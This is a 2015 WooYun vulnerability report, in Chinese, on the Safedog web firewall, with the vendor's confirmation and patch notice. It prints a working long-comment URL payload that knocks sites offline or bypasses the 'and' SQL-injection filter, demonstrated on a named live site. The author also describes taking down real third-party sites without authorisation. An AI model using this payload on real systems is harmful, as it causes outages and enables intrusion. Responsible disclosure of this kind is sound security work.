当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129611

漏洞标题:安全狗拒绝服务/注入绕过(可导致大量网站拒绝服务)

相关厂商:安全狗

漏洞作者: 路人甲

提交时间:2015-07-27 10:15

修复时间:2015-10-26 16:16

公开时间:2015-10-26 16:16

漏洞类型:拒绝服务

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向第三方安全合作伙伴开放
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

恨他就让他装个安全狗吧。

详细说明:

1.拒绝服务
安全狗的某个版本在处理参数的时候处理不当,导致网站503拒绝服务。另外,该版本应该很常见吧,一共打了15个有狗的站,只有3个打不掉
在url中加入如下参数即可:

a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&


然后。。。该站就直接503了
虽然安全狗已经推出了最新版,并防止了该程序的崩溃
这是在

QQ图片20150723190137.jpg


QQ图片20150724104857.jpg


但是。。。这服务器上的升级程序是怎么回事?

QQ图片20150724104945.jpg


最好强制升级!
2.注入绕过(对于升级后的安全狗)
本地刚刚下载了个安全狗,肯定是最新的,同样是上面的payload,421个以上的a,最新版的可以bypass掉对‘and’的过滤,但至少421个6,少了就被拦截。
虽然只可以绕过"and"关键字,但是已经可以测试该网址是否存在注入了,详情见证明中的视频,如果还握有其他bypass,还也可以进一步利用。
被拦截:

http://bbs.sdcms.cn/company_/post.aspx?threadid=14669&action=reply&page=1%20and%201=1 and 1=1


放过:

http://bbs.sdcms.cn/company_/post.aspx?a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&threadid=14669&action=reply&page=1%20and%201=1 and 1=1


所以一共是两种情况,要么被挂掉,要么被绕过。

漏洞证明:

http://dns.aizhan.com/125.76.231.7/
这是个安装了该版本的安全狗的服务器,几乎所有网站都可以被挂掉,其他例子太多了,已经D成功的还有韵达美国官网,艾慕网等
视频地址:http://www.tudou.com/programs/view/SVUiRKopaTs/
密码1234
第二个视频被土豆屏蔽了,只能放百度云。
地址:http://pan.baidu.com/s/1o6JyH42
密码:yn9q

QQ图片20150725004147.png


QQ图片20150725004736.png

修复方案:

重新过滤,强制升级

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-28 16:14

厂商回复:

感谢提交,周一就看到了,到今天才确认是因为这边需要测试,然后也是让研发赶快发个“从3.4升级到3.5”的“补!丁!包!”给3.4版本的用户。
需要说明的是,该漏洞只影响3.4版本,最新的3.5版本是不受影响的,请广大站长放心。考虑到还有好多用户在用3.4版本的安全狗,所以这次的影响认定为“高”。
最后,欢迎白帽子对最新的3.5版进行测试,我们将公正的进行裁定,对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
最后的最后,本次的补丁将自(强)动(行)下(升)发(级),将版本提至3.5,请广大站长放心!

最新状态:

暂无